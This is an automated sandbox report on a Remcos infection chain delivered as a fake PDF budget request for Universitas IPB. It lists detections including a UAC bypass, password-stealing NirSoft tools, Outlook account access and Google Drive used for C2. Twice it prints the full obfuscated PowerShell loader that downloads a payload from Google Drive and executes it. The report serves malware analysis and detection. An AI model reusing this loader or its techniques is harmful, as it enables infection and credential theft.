Analysis Overview
SHA256
d7ea8908f53391d47f6ecf1e6bb8b30d03b0abb4c77f688d03920ceeeda66812
Threat Level: Known bad
The file 11112024_0717_PERMINTAAN ANGGARAN (Universitas IPB) ID177888_pdf.vbs.zip was found to be: Known bad.
Malicious Activity Summary
Remcos family
Remcos
UAC bypass
NirSoft MailPassView
NirSoft WebBrowserPassView
Detected Nirsoft tools
Uses browser remote debugging
Blocklisted process makes network request
Checks computer location settings
Accesses Microsoft Outlook accounts
Legitimate hosting services abused for malware hosting/C2
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Enumerates system info in registry
Modifies registry class
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious behavior: MapViewOfSection
Modifies registry key
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-11 07:17
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-11 07:17
Reported
2024-11-11 07:22
Platform
win7-20240708-en
Max time kernel
122s
Max time network
123s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2368 wrote to memory of 872 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2368 wrote to memory of 872 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2368 wrote to memory of 872 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PERMINTAAN ANGGARAN (Universitas IPB) ID177888·pdf.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Sybotic Fladorme Ribbefri Sawpit #><#Twangling Heltidsbeskftigendes Underkaste Ejerstrukturen undladelsessynders Shufty #>$Saltekarrene='reflip';function Yoick($Glyphs){If ($host.DebuggerEnabled) {$Sekteriker++;$Sithement=$Glyphs.'Length' - $Sekteriker} for ( $swiveling=4;$swiveling -lt $Sithement;$swiveling+=5){$Rorke=$swiveling;$Reglers+=$Glyphs[$swiveling]}$Reglers}function Narrestregen($Beat){ .($projiceret) ($Beat)}$Konsumeringernes=Yoick ' awmnMis e Libt Sog.Asp WCande VagbTrk cThymLdemai SikEFin N ,ikt esk ';$Stilmblerne=Yoick 'AfstMBrano DepzF reiFr nlSemil unka .kt/Demn ';$Tsiology=Yoick 'C emTStanl SolsMyel1Nodd2A gr ';$Kontraktioners='Trop[ TruNOldfE istTgen .Cy rS BlaEZar rOpegvSysti itcCE.soeSynsPSypioI iti mpeNbndeTgregMFejla Vikn artADa rGVkkee Aflrslat]Olie:E tr:In eS Slae ammcTil.UFelwrTar IprovT StaySnylpBattRRoseoStafTMarioAut CTr kO ramlDisk=,usp$tar TU,diSHy,rIRui oB hrL nteo .msg N.nYTalo ';$Stilmblerne+=Yoick 'Majo5 Bar. Reg0 Com Ins( orWOrdiiPartn etedBredoCarow upesUncr GrapNFresTShun .rim1 Pe,0Wayl.sko 0Nazi; nte TelW GuriPalenrung6Lvfa4Vago; Rem Ihsx usp6Work4Sags; eca RedrrUn qv ver: ig1sire3 ou 1S it.Udle0 ros) Hje nbuGLoreeElekcunfaksk toUne /supe2Sulp0Pulm1L.uc0 S.u0 Kim1s,is0 Den1Glut BrneFa,paiMinorInteeSkolfPanlo C,pxBayr/Vift1 erf3Soft1Comp.tric0Hove ';$Bedazement=Yoick 'Ski,US alsGammEParkrJean-Re kaTaoiG BageUnpon eciTNrre ';$Amoralitetens112=Yoick ' hi.hAtomtShartB ugpNikksKltr:Tr.q/forg/Yok,d ritrScati MorvAfgreDeba.Sl mgKrusoBankoResigAdral Cr,eNonv.aflyc OpfoEftemBein/Justu LsecRac ?Fad e.hrexbiblpGrino ommrSocitGnav=Snond Oato IndwBetenHyb l UnpoBracaD tadSvrm&ParliKnopdBehn=Cant1 husGmanaY op V UklwE brA De ZbrevePol _ Nask Mav3IndsHrecoh Fu X H.soHynet Lov-TilfX.ikkTTffeFAntiVUdspa JulaCoulE.usch Va 9 LeaUS reUUninqVrdii.aryJ.idrHGablY tox ';$Vulvocrural=Yoick 'Bye >Exta ';$projiceret=Yoick 'IrroI SolEUdgaXS od ';$Spanierne='betydningslren';$swivelingnsipient='\Borgerrettighed.Pol';Narrestregen (Yoick 'Alky$TilkG RadLTr kO L.pbDataABushlSt l:TorrmBortYnormO de pPreerBarrOhalvTBirte C liM.sonSurg=oppu$Nun eR dunBobrVBlas:CoadasdumPNumep uledtmmeACroqTSte a ,nd+Bram$BallSsi.kW.icriIntevPulwENdr lLup IEatan AdvgOpern SskST,wei engPTidsIBi,teUnbuN Afnta is ');Narrestregen (Yoick ' Cha$ MargBag Lt stoMaribMercAStilL B,d:For.SHor.aFr,eLUlt gAr esL,vicShimHMo,ea Sp uM.ndFTankFSarkrPlir5upca3Izaf=.one$ArmeaPendMTtnioCarbrH arALng lS rdiRiddt.onfETrutT RecEMetrNTr.msEndt1Pala1Poly2Evil.IrresMo op Un lLirkIEchotFeml(Syst$UdskVNaa uN,npl icvImbuO.pstCDwarrkonsu FasrD.avABekrlhawa),ord ');Narrestregen (Yoick $Kontraktioners);$Amoralitetens112=$Salgschauffr53[0];$Skandale130=(Yoick 'Co,n$dio gibinlCykeODoteB DedAK plL ,em:giolSUfo k ProiAnaxLPer L Hume unVUddegskrmSSelvfTablLBefiyHaantFortnAffai Po ND.aegOligSA le=AvlenLegae.arnwprea-StrioGastbAlitjVandE Ai cBoliT Try BesS CuryAcmaSAnveTUhareUnmem Aft.bogs$PuiskLataOThewN kaSbygguOphom Al E rchRUd eICur NNonaGAarmeTrearde,aNWildeLvsaSpreo ');Narrestregen ($Skandale130);Narrestregen (Yoick 'Lisc$ SveS GrukHe.iiIn alGstel NoneAff vLym gTingsDem fSkrilPi.ayForstBesknB,ggiApornaagegjungsA ie.WielH ArveCapraAjledAbnoeMaskrOpbysMoon[Fe.h$ nteBMor.eT akdVulcaDevozV lgeF rlmdk ieCo sn.ecttnar ]Usn = Pyr$PangSBenetAffei ndsl,nfrm Moob tillEftee BogrSlvknKulle Br ');$Paramastigate=Yoick 'Snyd$PostSDetekS.bciDepalRe sl CiteOvervPr,vgDe,es JowfG rdlJoggyJ but ParnJageiRenunResigUni sUn a.T.enD.ynooVentwSulfnUndelUlovo GuaahunddPortFSor.iTherlsagteR.ms(Chon$El cA intm ovso arir nstaEksplSk.giUgant UnceDr ftSnedeSammn .eys Ra.1Styr1,arg2,lbe, Scr$Fo lJ StruEnt mLnfobAutol tile,jord Rek4 ebr1Sild)Udsk ';$Jumbled41=$Myoprotein;Narrestregen (Yoick 'R,su$Om,gGS,vsL aaOEpigB GalASymbL Slu: P tVHalsrRab I GamGPelt= Bla(ForsT Re eR,nmSSapoTOver-BaklPMidnaMisltAmbiHOp f Macr$Ol gJS avUForkmu.soBIndtL idE PreDH,ar4 Baj1 Cni) ver ');while (!$vrig) {Narrestregen (Yoick 'C,ar$KopigGy,nl Fiso Gi bAstea Ve,l Dea:Ban A TjabTravs renvMaglo MislL,antmin =Thor$Anubtnon r eruAutoe,las ') ;Narrestregen $Paramastigate;Narrestregen (Yoick ',illsGeneTAkhla IntRMisitCyto- bersGeofLarreePho eFor.PBr.s Stam4Midd ');Narrestregen (Yoick 'Spe $ nfuGOu dlMornoPreoBIm aa CyklHomm: IsbvScenrVerdiFascg,ens=Gest( DektCo.pEneigSLamptpigg-GoutPm.isATeleT.rbah ,uk Redi$ FrujPol.uvalgmBon BFi eL DiveOverdTi g4Cons1Elec) Pr ') ;Narrestregen (Yoick ' Phr$ SevgFodbl,agtoSnakbUde ABrnelNatt:Rou mImboORollDS,amu Zanl .reAP otTLandIMurrOTaroNBu h=.dvi$ ArsGSweeL Ku.OUnrub XreaOmkrlGall:FortD ndeEBrempalc.H PlaLN,diO,uliG OveITandS lot inniTittc soma omnT MusEmilj+Vedf+Patr%Tidm$ParaS Ch aBo.tlKikkGRedasTykscI.teh ndeA MaiUcataFPo sfVagor ig5 ont3Drif.m,lmCLiceoBeviUIntenGerbtFor ') ;$Amoralitetens112=$Salgschauffr53[$Modulation]}$Hvervenes=280926;$Korrespondens=30345;Narrestregen (Yoick '.amu$IberG .nfLUdenoLevebReasAfierLNaes:UnplFEquaoTarpRparaTJereROutbnThunElapnL Stes SvieRundRBldg Marv= M s ConfGantie UnstLebe- EyeC oleo TubnKnigTCan eMa znFor tDhan Prop$RuneJWateUmundM ekaBBruglRem.eNe eD.eho4Me a1Tryk ');Narrestregen (Yoick 'Reli$NonegRep lOranoMantbfaxeaReaslSoli:HoveKRegloWeisgDriva Ce lUndvsProskMoonaProbb ,etsTegn und =Ubev Pers[ Ve SmiscyCym sForstReocePaenm and.LambC WanoUndenAnalvHusleVibrr UnrtProg]mask:Dewb:KlieFJaycrDecaoSkjomSt nBLi eaPerss Xyle Lon6El e4Co.uSStoltInelroveri Snun AdvgIndt(Ante$A,owfMytoo plarSpeetRea.rForenP treReallPhocsJi se blorKoka)Micr ');Narrestregen (Yoick ' .un$ImmuG raLGgetoHy.rBOmbuA Vr l est: Oves T do Pe nUndegPosisSamkT ElaRImpreBranSSkibsSupeeU baS ao1 Ep 6B ff5Hamm Kr k=Lind Para[VrdisRelaYRe.asSeruTUrinEAfspmSty..DititAntiE ,ncxza iT ,ae.TherE ycanBereCFrgeoS uddDecriBe yn TeaGAnbe]Legi:Zina:Be.yA RaaS l.uCCellIS eei Sut.RoseGLaudeStrmtLrerSBaryT SamRS.kuIforfNOverGObse(Gen,$U.isKChecOUroegExpuA yralOrk S VenkA,anASpigB Carsno i) hir ');Narrestregen (Yoick 'Ophr$LitagMultLNomioSledbKubiAc urLColu: Ge mAnt eActiSOto,sErikeJupiNTrus= Fly$Spr SNiseOPer NDenaGUhanSBladtFuldRFl ve.ebisAf vSChinE SlysOutb1St r6,eni5s ba. ifns HeduStowBBjrnS RoutJulerInfoI BlonAutoG Res( V d$ andH alaVPdqae.ollRRapsVB llEA,niNm,gneDe esSkra,Une $Ri pkKle OAtomrHumiRNonfED.mmS EndPKommo.vern SkrdNordEbarnnAn,iSU,ti)Pycn ');Narrestregen $Messen;"
Network
Files
C:\Users\Admin\AppData\Local\Temp\CabB260.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
memory/872-20-0x000007FEF664E000-0x000007FEF664F000-memory.dmp
memory/872-21-0x000000001B800000-0x000000001BAE2000-memory.dmp
memory/872-22-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp
memory/872-25-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp
memory/872-24-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp
memory/872-23-0x0000000000680000-0x0000000000688000-memory.dmp
memory/872-26-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp
memory/872-27-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp
memory/872-28-0x000007FEF664E000-0x000007FEF664F000-memory.dmp
memory/872-29-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp
memory/872-30-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp
memory/872-31-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp
memory/872-32-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp
memory/872-33-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-11 07:17
Reported
2024-11-11 07:22
Platform
win10v2004-20241007-en
Max time kernel
297s
Max time network
280s
Command Line
Signatures
Remcos
Remcos family
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
Detected Nirsoft tools
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
NirSoft MailPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Uses browser remote debugging
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Windows\SysWOW64\msiexec.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2024 set thread context of 2524 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Windows\SysWOW64\msiexec.exe |
| PID 2024 set thread context of 1416 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Windows\SysWOW64\msiexec.exe |
| PID 2024 set thread context of 4664 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Windows\SysWOW64\msiexec.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PERMINTAAN ANGGARAN (Universitas IPB) ID177888·pdf.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Sybotic Fladorme Ribbefri Sawpit #><#Twangling Heltidsbeskftigendes Underkaste Ejerstrukturen undladelsessynders Shufty #>$Saltekarrene='reflip';function Yoick($Glyphs){If ($host.DebuggerEnabled) {$Sekteriker++;$Sithement=$Glyphs.'Length' - $Sekteriker} for ( $swiveling=4;$swiveling -lt $Sithement;$swiveling+=5){$Rorke=$swiveling;$Reglers+=$Glyphs[$swiveling]}$Reglers}function Narrestregen($Beat){ .($projiceret) ($Beat)}$Konsumeringernes=Yoick ' awmnMis e Libt Sog.Asp WCande VagbTrk cThymLdemai SikEFin N ,ikt esk ';$Stilmblerne=Yoick 'AfstMBrano DepzF reiFr nlSemil unka .kt/Demn ';$Tsiology=Yoick 'C emTStanl SolsMyel1Nodd2A gr ';$Kontraktioners='Trop[ TruNOldfE istTgen .Cy rS BlaEZar rOpegvSysti itcCE.soeSynsPSypioI iti mpeNbndeTgregMFejla Vikn artADa rGVkkee Aflrslat]Olie:E tr:In eS Slae ammcTil.UFelwrTar IprovT StaySnylpBattRRoseoStafTMarioAut CTr kO ramlDisk=,usp$tar TU,diSHy,rIRui oB hrL nteo .msg N.nYTalo ';$Stilmblerne+=Yoick 'Majo5 Bar. Reg0 Com Ins( orWOrdiiPartn etedBredoCarow upesUncr GrapNFresTShun .rim1 Pe,0Wayl.sko 0Nazi; nte TelW GuriPalenrung6Lvfa4Vago; Rem Ihsx usp6Work4Sags; eca RedrrUn qv ver: ig1sire3 ou 1S it.Udle0 ros) Hje nbuGLoreeElekcunfaksk toUne /supe2Sulp0Pulm1L.uc0 S.u0 Kim1s,is0 Den1Glut BrneFa,paiMinorInteeSkolfPanlo C,pxBayr/Vift1 erf3Soft1Comp.tric0Hove ';$Bedazement=Yoick 'Ski,US alsGammEParkrJean-Re kaTaoiG BageUnpon eciTNrre ';$Amoralitetens112=Yoick ' hi.hAtomtShartB ugpNikksKltr:Tr.q/forg/Yok,d ritrScati MorvAfgreDeba.Sl mgKrusoBankoResigAdral Cr,eNonv.aflyc OpfoEftemBein/Justu LsecRac ?Fad e.hrexbiblpGrino ommrSocitGnav=Snond Oato IndwBetenHyb l UnpoBracaD tadSvrm&ParliKnopdBehn=Cant1 husGmanaY op V UklwE brA De ZbrevePol _ Nask Mav3IndsHrecoh Fu X H.soHynet Lov-TilfX.ikkTTffeFAntiVUdspa JulaCoulE.usch Va 9 LeaUS reUUninqVrdii.aryJ.idrHGablY tox ';$Vulvocrural=Yoick 'Bye >Exta ';$projiceret=Yoick 'IrroI SolEUdgaXS od ';$Spanierne='betydningslren';$swivelingnsipient='\Borgerrettighed.Pol';Narrestregen (Yoick 'Alky$TilkG RadLTr kO L.pbDataABushlSt l:TorrmBortYnormO de pPreerBarrOhalvTBirte C liM.sonSurg=oppu$Nun eR dunBobrVBlas:CoadasdumPNumep uledtmmeACroqTSte a ,nd+Bram$BallSsi.kW.icriIntevPulwENdr lLup IEatan AdvgOpern SskST,wei engPTidsIBi,teUnbuN Afnta is ');Narrestregen (Yoick ' Cha$ MargBag Lt stoMaribMercAStilL B,d:For.SHor.aFr,eLUlt gAr esL,vicShimHMo,ea Sp uM.ndFTankFSarkrPlir5upca3Izaf=.one$ArmeaPendMTtnioCarbrH arALng lS rdiRiddt.onfETrutT RecEMetrNTr.msEndt1Pala1Poly2Evil.IrresMo op Un lLirkIEchotFeml(Syst$UdskVNaa uN,npl icvImbuO.pstCDwarrkonsu FasrD.avABekrlhawa),ord ');Narrestregen (Yoick $Kontraktioners);$Amoralitetens112=$Salgschauffr53[0];$Skandale130=(Yoick 'Co,n$dio gibinlCykeODoteB DedAK plL ,em:giolSUfo k ProiAnaxLPer L Hume unVUddegskrmSSelvfTablLBefiyHaantFortnAffai Po ND.aegOligSA le=AvlenLegae.arnwprea-StrioGastbAlitjVandE Ai cBoliT Try BesS CuryAcmaSAnveTUhareUnmem Aft.bogs$PuiskLataOThewN kaSbygguOphom Al E rchRUd eICur NNonaGAarmeTrearde,aNWildeLvsaSpreo ');Narrestregen ($Skandale130);Narrestregen (Yoick 'Lisc$ SveS GrukHe.iiIn alGstel NoneAff vLym gTingsDem fSkrilPi.ayForstBesknB,ggiApornaagegjungsA ie.WielH ArveCapraAjledAbnoeMaskrOpbysMoon[Fe.h$ nteBMor.eT akdVulcaDevozV lgeF rlmdk ieCo sn.ecttnar ]Usn = Pyr$PangSBenetAffei ndsl,nfrm Moob tillEftee BogrSlvknKulle Br ');$Paramastigate=Yoick 'Snyd$PostSDetekS.bciDepalRe sl CiteOvervPr,vgDe,es JowfG rdlJoggyJ but ParnJageiRenunResigUni sUn a.T.enD.ynooVentwSulfnUndelUlovo GuaahunddPortFSor.iTherlsagteR.ms(Chon$El cA intm ovso arir nstaEksplSk.giUgant UnceDr ftSnedeSammn .eys Ra.1Styr1,arg2,lbe, Scr$Fo lJ StruEnt mLnfobAutol tile,jord Rek4 ebr1Sild)Udsk ';$Jumbled41=$Myoprotein;Narrestregen (Yoick 'R,su$Om,gGS,vsL aaOEpigB GalASymbL Slu: P tVHalsrRab I GamGPelt= Bla(ForsT Re eR,nmSSapoTOver-BaklPMidnaMisltAmbiHOp f Macr$Ol gJS avUForkmu.soBIndtL idE PreDH,ar4 Baj1 Cni) ver ');while (!$vrig) {Narrestregen (Yoick 'C,ar$KopigGy,nl Fiso Gi bAstea Ve,l Dea:Ban A TjabTravs renvMaglo MislL,antmin =Thor$Anubtnon r eruAutoe,las ') ;Narrestregen $Paramastigate;Narrestregen (Yoick ',illsGeneTAkhla IntRMisitCyto- bersGeofLarreePho eFor.PBr.s Stam4Midd ');Narrestregen (Yoick 'Spe $ nfuGOu dlMornoPreoBIm aa CyklHomm: IsbvScenrVerdiFascg,ens=Gest( DektCo.pEneigSLamptpigg-GoutPm.isATeleT.rbah ,uk Redi$ FrujPol.uvalgmBon BFi eL DiveOverdTi g4Cons1Elec) Pr ') ;Narrestregen (Yoick ' Phr$ SevgFodbl,agtoSnakbUde ABrnelNatt:Rou mImboORollDS,amu Zanl .reAP otTLandIMurrOTaroNBu h=.dvi$ ArsGSweeL Ku.OUnrub XreaOmkrlGall:FortD ndeEBrempalc.H PlaLN,diO,uliG OveITandS lot inniTittc soma omnT MusEmilj+Vedf+Patr%Tidm$ParaS Ch aBo.tlKikkGRedasTykscI.teh ndeA MaiUcataFPo sfVagor ig5 ont3Drif.m,lmCLiceoBeviUIntenGerbtFor ') ;$Amoralitetens112=$Salgschauffr53[$Modulation]}$Hvervenes=280926;$Korrespondens=30345;Narrestregen (Yoick '.amu$IberG .nfLUdenoLevebReasAfierLNaes:UnplFEquaoTarpRparaTJereROutbnThunElapnL Stes SvieRundRBldg Marv= M s ConfGantie UnstLebe- EyeC oleo TubnKnigTCan eMa znFor tDhan Prop$RuneJWateUmundM ekaBBruglRem.eNe eD.eho4Me a1Tryk ');Narrestregen (Yoick 'Reli$NonegRep lOranoMantbfaxeaReaslSoli:HoveKRegloWeisgDriva Ce lUndvsProskMoonaProbb ,etsTegn und =Ubev Pers[ Ve SmiscyCym sForstReocePaenm and.LambC WanoUndenAnalvHusleVibrr UnrtProg]mask:Dewb:KlieFJaycrDecaoSkjomSt nBLi eaPerss Xyle Lon6El e4Co.uSStoltInelroveri Snun AdvgIndt(Ante$A,owfMytoo plarSpeetRea.rForenP treReallPhocsJi se blorKoka)Micr ');Narrestregen (Yoick ' .un$ImmuG raLGgetoHy.rBOmbuA Vr l est: Oves T do Pe nUndegPosisSamkT ElaRImpreBranSSkibsSupeeU baS ao1 Ep 6B ff5Hamm Kr k=Lind Para[VrdisRelaYRe.asSeruTUrinEAfspmSty..DititAntiE ,ncxza iT ,ae.TherE ycanBereCFrgeoS uddDecriBe yn TeaGAnbe]Legi:Zina:Be.yA RaaS l.uCCellIS eei Sut.RoseGLaudeStrmtLrerSBaryT SamRS.kuIforfNOverGObse(Gen,$U.isKChecOUroegExpuA yralOrk S VenkA,anASpigB Carsno i) hir ');Narrestregen (Yoick 'Ophr$LitagMultLNomioSledbKubiAc urLColu: Ge mAnt eActiSOto,sErikeJupiNTrus= Fly$Spr SNiseOPer NDenaGUhanSBladtFuldRFl ve.ebisAf vSChinE SlysOutb1St r6,eni5s ba. ifns HeduStowBBjrnS RoutJulerInfoI BlonAutoG Res( V d$ andH alaVPdqae.ollRRapsVB llEA,niNm,gneDe esSkra,Une $Ri pkKle OAtomrHumiRNonfED.mmS EndPKommo.vern SkrdNordEbarnnAn,iSU,ti)Pycn ');Narrestregen $Messen;"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
